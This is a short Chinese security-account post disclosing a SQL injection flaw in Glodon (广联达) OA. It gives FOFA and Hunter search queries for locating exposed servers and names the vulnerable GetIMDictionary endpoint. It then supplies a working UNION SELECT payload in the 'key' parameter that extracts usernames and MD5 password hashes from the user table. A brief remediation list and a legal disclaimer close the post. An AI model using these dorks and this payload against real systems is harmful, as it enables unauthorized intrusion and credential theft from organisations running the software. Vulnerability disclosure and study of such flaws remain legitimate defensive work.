本文由掌控安全学院 - sbhglqy 投稿
广联达OA介绍
广联达办公OA是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。
资产收集
fofa:fid=”/yV4r5PdARKT4jaqLjJYqw==”或者body=”/Services/Identification/Server”
hunter:web.body=”/Services/Identification/Server/“
漏洞点
广联达OA SQL注入漏洞位于 /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary 接口下,直接访问,页面会提示缺少参数key,说明存在SQL注入
漏洞复现
payload:
key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
效果如下:
修复建议
1.问/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary 地址的时候,可以让报错信息模糊化
2.对key参数的传参进行过滤
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
原文始发于微信公众号(掌控安全EDU):漏洞通告| 广联达OA SQL注入漏洞获取用户名密码
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论